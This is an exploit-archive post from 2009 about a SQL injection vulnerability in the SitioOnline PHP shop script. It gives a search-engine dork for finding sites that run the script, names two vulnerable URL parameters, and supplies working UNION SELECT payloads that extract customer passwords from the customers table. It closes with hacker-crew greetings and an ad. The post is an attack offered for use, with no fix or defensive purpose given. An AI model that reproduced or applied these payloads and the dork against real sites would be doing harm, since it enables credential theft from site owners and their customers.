Home / exploits sitioonline-sql.txt
Posted on 15 December 2009
**********************- cvs -vrew *********************** [!] SitioOnline SQL Injection Vulnerability [!] Author : 4lG3r14n0-t3r0 [!] MAIL : v5@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.SitioOnline.cl [+] script : SitioOnline [+] Download : [+] Vulnerability : php SQL injection [+] Dork :inurl:"lista_articulos.php?id_categoria=" or Powered by SitioOnline.com **************************************************************************/ [ Vulnerable File ] http://server/lista_articulos.php?id_categoria= http://server/detalle_articulo.php?id_producto= [ Exploit ] [1] http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers-- [2] http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers-- [ Greets ] [+] :cvs crew : ange78 , saf1-casanova,jess-injection,ijection-master,dark-master , alqaiser, u$er-maskine , ALL HACKERS MUSLIMS & all members of : tryag.cc , hackteach.org made in algeria N'est pas mort ce qui à jamais dort ________________________________ PC, téléphones portables, souris hi-tech. à gagner grâce à Hotmail ! C'est ici !<http://www.hotmailmagicmoment.com>
